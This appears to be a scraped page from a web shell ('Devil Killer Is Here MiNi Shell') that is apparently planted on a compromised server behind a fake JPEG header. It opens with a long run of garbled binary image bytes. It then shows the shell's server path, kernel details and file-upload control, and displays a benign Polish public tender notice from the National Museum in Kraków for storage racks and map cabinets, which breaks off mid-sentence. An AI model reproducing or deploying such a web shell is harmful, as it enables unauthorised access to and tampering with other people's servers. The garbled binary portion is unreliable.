JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241007/0053447201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Wykonanie wyposażenia przestrzeni magazynów studyjnych przestrzeni powstającej galerii „Malarstwo i Rzeźba Zachodnioeuropejska </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Muzeum Narodowe w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000275961</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. 3 Maja 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-062</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 433-56-00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dyrekcja@mnk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mnk.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie wyposażenia przestrzeni magazynów studyjnych przestrzeni powstającej galerii „Malarstwo i Rzeźba Zachodnioeuropejska </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a88192a4-a53e-4976-a406-194de9798c28</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00534472</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mnk.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu komunikacja między Zamawiającym a Wykonawcami, w<br/>szczególności składanie ofert oraz wszelkich oświadczeń, odbywa się przy użyciu Platformy elektronicznej.<br/>2. Środkiem komunikacji elektronicznej, służącym złożeniu oferty oraz wszelkich oświadczeń przez Wykonawcę, jest Platforma<br/>zakupowa on-line Marketplanet dostępna pod adresem https://mnk.ezamawiajacy.pl - dalej zwana „Platformą</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania dotyczące zasad rejestracji<br/>oraz minimalnych parametrów technicznych wymaganych od wykonawcy przy wykorzystywaniu systemu do elektronicznej komunikacji z wykonawcami: Oferta wraz z załącznikami musi zostać złożona w postaci<br/>elektronicznej. Złożenie oferty wymaga do Wykonawcy zarejestrowania się i zalogowania w systemie informatycznym dostępnym<br/>pod adresem https://mnk.ezamawiajacy.pl, zgodnie z poniższą kolejnością. Rejestracja wykonawcy trwa maksymalnie do 2 dni<br/>roboczych. Mając to na uwadze, zamawiający zaleca wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie<br/>złożenia oferty w postaci elektronicznej. Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do<br/>strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego<br/>konta. Wykonawca biorący udział w postępowaniu prowadzonym drogą elektroniczną w systemie zakłada konto, wykonując kroki<br/>procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/>regulamin, klika polecenie „zarejestruj się”. Po założeniu konta wykonawca ma możliwość złożenia oferty w postępowaniu.<br/>3. Zamawiający wskazuje informacje, o których mowa w Rozporządzenia Prezesa Rady Ministrów w sprawie użycia środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępnienia i przechowywania dokumentów<br/>elektronicznych, dotyczące systemu dostępnego pod adresem https://mnk.ezamawiajacy.pl:<br/>1) komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta<br/>2) Wybrana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google Chrome lub MS Edge<br/>3) Podłączenie do Internetu: min. 512 Kb/s na komputer (zalecane szerokopasmowe łącze internetowe)<br/>4. Zapytania do SWZ należy zadawać za pośrednictwem platformy zakupowej zamawiającego przez link:<br/>https://mnk.ezamawiajacy.pl. Instrukcja korzystania z systemu jest dostępna pod wyżej wskazanym adresem. W przypadku trudności<br/>technicznych związanych z korzystaniem z Platformy, Zamawiający dopuszcza możliwość przekazywania informacji drogą<br/>elektroniczną: zam_publ@mnk.pl<br/>5. Oferta wraz z załącznikami musi być złożona w postaci elektronicznej w systemie informatycznym dostępnym pod adresem<br/>https://mnk.ezamawiajacy.pl.<br/>6. Za datę złożenia oferty, przekazania wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na platformę zakupową zamawiającego,<br/>opisane zostały w Instrukcji dla wykonawców która jest udostępniana na platformie zakupowej zamawiającego.<br/>7. Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca<br/>winien skontaktować się z dostawcą rozwiązania teleinformatycznego Marketplanet tel. (22) 576-87-90, e-mail:<br/>oneplace@marketplanet.pl<br/>8. Zgodnie z art. 67 Pzp określa się informacje na temat kodowania i czasu odbioru danych, tj: Plik załączony przez Wykonawcę na<br/>Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia<br/>pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.<br/>9. Szczegółowa instrukcja korzystania z Platformy dotycząca rejestracji, logowania, procedury przesyłania i wycofania dokumentów<br/>znajduje się na stronie internetowej https://mnk.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>•	Administratorem Pani/Pana danych osobowych jest Muzeum Narodowe w Krakowie z siedzibą w Krakowie (kontakt: Al. 3 Maja 1, 30-062 Kraków, tel.0-12 43 35 620, adres e-mail: dyrekcja@mnk.pl).<br/>•	Dane kontaktowe inspektora ochrony danych w Muzeum Narodowym w Krakowie - adres e-mail: iod@mnk.pl .<br/>•	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego nr sprawy: EP.ZP.271.43.2024 prowadzonym w trybie podstawowym;<br/>•	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 oraz art. 291 ust. 1 zdanie drugie ustawy z dnia 11 września 2019r. Prawo zamówień publicznych (Dz. U. z 2023 r., poz. 1605) dalej „ustawa Pzp”; <br/>•	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, <br/>•	a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>•	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>•	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>•	posiada Pani/Pan:<br/>	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ; <br/>	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">•	nie przysługuje Pani/Panu:<br/>	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>	Do przetwarzania danych osobowych osób fizycznych w tym okresie Zamawiający stosuje przepisy ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych (DZ.U. z 2018 r. poz. 1000) oraz rozporządzenia 2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">EP.ZP.271.43.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 500000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Część 1: Regały jezdne z wałkami - Regał 1, Regał 2, Regał 3 i Regał 4:<br/>1)	ilość regałów: Regał 1 – 1 szt., Regał 2 – 1 szt., Regał 3 – 6 szt., Regał 4 – 6 szt.;<br/>2)	konstrukcja regałów wykonana z profili stalowych, stężona stężeniami krzyżowymi stalowymi;<br/>3)	każdy regał powinien być wyposażony w szesnaście wałków rozbitych na dwa rzędy: Regał 1 – 16 szt., Regał 2 – 16 szt., Regał 3 – 96 szt., Regał 4 – 96 szt.; <br/>4)	średnica wałka: 10 cm;<br/>5)	konstrukcja wałka wykonana z aluminium w formie rury bez perforacji, lakierowana farbą proszkową utwardzaną termicznie;<br/>6)	szerokości wałków należy wykonać według załączonej specyfikacji tj. Regał 1 – 350 cm, Regał 2 – 300 cm, Regał 3 – 250 cm, Regał 4 – 150 cm;<br/>7)	wałki obrotowe, łożyskowane na zakrytych łożyskach tocznych umożliwiających płynne obracanie się;<br/>8)	zawiesia wałków z możliwością regulacji w pionie bez użycia specjalistycznych narzędzi;<br/>9)	każdy regał z uwagi na jego jezdną funkcję wyposażyć w zestaw kołowy skrętny FI 100mm mocowany na płytkę z kołem z elastyczną oponką i hamulcem.<br/>10)	wymiary zewnętrzne regału: wysokość max. 205 cm, szerokość podyktowana szerokością wałków, które nie mogą ulec zmianie, głębokość max. 75 cm;<br/>11)	brak ostrych krawędzi </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 300000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39141100-3 - Regały</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39131100-0 - Regały archiwalne</p> <p class="mb-0">45223100-7 - Montaż konstrukcji metalowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający w zakresie każdej z części zamówienia wyznaczył dwa kryteria oceny i wyboru ofert:<br/>•	Cena (C) 60%<br/>•	Gwarancja i rękojmia (G)40%<br/><br/>3.	Ocena ofert w kryterium „Cena” (C). <br/>„Cena” rozumiana jako całkowita wartość oferty brutto, obejmująca kwotę za realizację całego zamówienia w ramach danej części zamówienia.<br/>Punktacja w tym kryterium zostanie ustalona w następujący sposób:<br/>C obliczana = (X min : X obliczana ) x 60 <br/>gdzie: <br/>•	C obliczana - liczba punktów badanej oferty w kryterium „cena”;<br/>•	X min – najniższa cena pośród złożonych ważnych ofert;<br/>•	X obliczana – cena badanej oferty.<br/>Maksymalną ilość punktów (60 pkt.) w niniejszym kryterium uzyska Wykonawca który <br/>w ofercie wskaże najniższa cenę. <br/><br/>4.	Ocena ofert w kryterium „Gwarancja i rękojmia” (W)<br/>Gwarancja i rękojmia - rozumiana jako zobowiązanie Wykonawcy do zapewnienia odpowiedniej jakości elementów składających się na przedmiot umowy (materiałów), ich wykonania i montażu. <br/><br/>Punktacja w tym kryterium zostanie ustalona w następujący sposób:<br/>Jeżeli Wykonawca wskaże w Formularzu Ofertowym, że oferuje: <br/>-	60 miesięcy gwarancji i rękojmi na dostarczone elementy stanowiące przedmiot umowy oraz ich odpowiedni montaż, wówczas jego oferta otrzyma 40 pkt,<br/>-	48 miesięcy gwarancji i rękojmi na dostarczone elementy stanowiące przedmiot umowy oraz ich odpowiedni montaż, wówczas jego oferta otrzyma 30 pkt. <br/>-	36 miesięcy gwarancji i rękojmi na dostarczone elementy stanowiące przedmiot umowy oraz ich odpowiedni montaż, wówczas jego oferta otrzyma 20 pkt<br/>-	24 miesięcy gwarancji i rękojmi na dostarczone elementy stanowiące przedmiot umowy oraz ich odpowiedni montaż, wówczas jego oferta otrzyma 10 pkt<br/>Wykonawca winien zaznaczyć jedną z opcji w tym zakresie w formularzu ofertowym. <br/>W przypadku jeśli Wykonawca nie zaznaczy żadnej z opcji, Zamawiający uzna, że Wykonawca oferuje 12 miesięczny okres gwarancji i rękojmi na dostarczone elementy stanowiące przedmiot umowy oraz ich odpowiedni montaż i nie przyzna dodatkowym punktów w tym kryterium. Maksymalną ilość punktów (40 pkt.) w niniejszym kryterium uzyska oferta, w której Wykonawca wskaże, że zaoferuje co najmniej 60 miesięczny okres gwarancji i rękojmi na dostarczone elementy stanowiące przedmiot umowy oraz ich odpowiedni montaż.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.	Część 2: Szafa mapowa z szufladami:<br/>1)	Ilość: 2 sztuki;<br/>2)	szafa wykonana z blachy stalowej zimnowalcowanej o grubości w przedziale między 0,8 mm a 1,0 mm;<br/>3)	szafa zamykana zamkiem centralnym;<br/>4)	blacha malowana proszkowo we wskazanym przez Zleceniodawcę kolorze;<br/>5)	wymiar całkowity / zewnętrzny: wysokość 194 cm, szerokość 170 cm, głębokość 100 cm;<br/>6)	szuflady na prowadnicach kulkowych o pełnym wysuwie, zabezpieczone przez wypadaniem w postaci ogranicznika plus blokada ręczna;<br/>7)	wymiary wewnętrzne szuflad: (153,5x96,5x11,5cm) szer. x gł. x wys.;<br/>8)	nośność pojedynczej półki powinna wynosić przynajmniej 30 kg;<br/>9)	szafa na nóżkach z możliwością regulacji;<br/>10)	brak ostrych krawędzi;<br/>11)	każda półka wyposażona w transparentną etykietę/kieszeń z trwałego materiał np. poliwęglanu litego z możliwością umieszczenia w niej opisu </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 90000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39173000-5 - Meble do przechowywania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45223100-7 - Montaż konstrukcji metalowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający w zakresie każdej z części zamówienia wyznaczył dwa kryteria oceny i wyboru ofert:<br/>•	Cena (C) 60%<br/>•	Gwarancja i rękojmia (G)40%<br/><br/>3.	Ocena ofert w kryterium „Cena” (C). <br/>„Cena” rozumiana jako całkowita wartość oferty brutto, obejmująca kwotę za realizację całego zamówienia w ramach danej części zamówienia.<br/>Punktacja w tym kryterium zostanie ustalona w następujący sposób:<br/>C obliczana = (X min : X obliczana ) x 60 <br/>gdzie: <br/>•	C obliczana - liczba punktów badanej oferty w kryterium „cena”;<br/>•	X min – najniższa cena pośród złożonych ważnych ofert;<br/>•	X obliczana – cena badanej oferty.<br/>Maksymalną ilość punktów (60 pkt.) w niniejszym kryterium uzyska Wykonawca który <br/>w ofercie wskaże najniższa cenę. <br/><br/>4.	Ocena ofert w kryterium „Gwarancja i rękojmia” (W)<br/>Gwarancja i rękojmia - rozumiana jako zobowiązanie Wykonawcy do zapewnienia odpowiedniej jakości elementów składających się na przedmiot umowy (materiałów), ich wykonania i montażu. <br/><br/>Punktacja w tym kryterium zostanie ustalona w następujący sposób:<br/>Jeżeli Wykonawca wskaże w Formularzu Ofertowym, że oferuje: <br/>-	60 miesięcy gwarancji i rękojmi na dostarczone elementy stanowiące przedmiot umowy oraz ich odpowiedni montaż, wówczas jego oferta otrzyma 40 pkt,<br/>-	48 miesięcy gwarancji i rękojmi na dostarczone elementy stanowiące przedmiot umowy oraz ich odpowiedni montaż, wówczas jego oferta otrzyma 30 pkt. <br/>-	36 miesięcy gwarancji i rękojmi na dostarczone elementy stanowiące przedmiot umowy oraz ich odpowiedni montaż, wówczas jego oferta otrzyma 20 pkt<br/>-	24 miesięcy gwarancji i rękojmi na dostarczone elementy stanowiące przedmiot umowy oraz ich odpowiedni montaż, wówczas jego oferta otrzyma 10 pkt<br/>Wykonawca winien zaznaczyć jedną z opcji w tym zakresie w formularzu ofertowym. <br/>W przypadku jeśli Wykonawca nie zaznaczy żadnej z opcji, Zamawiający uzna, że Wykonawca oferuje 12 miesięczny okres gwarancji i rękojmi na dostarczone elementy stanowiące przedmiot umowy oraz ich odpowiedni montaż i nie przyzna dodatkowym punktów w tym 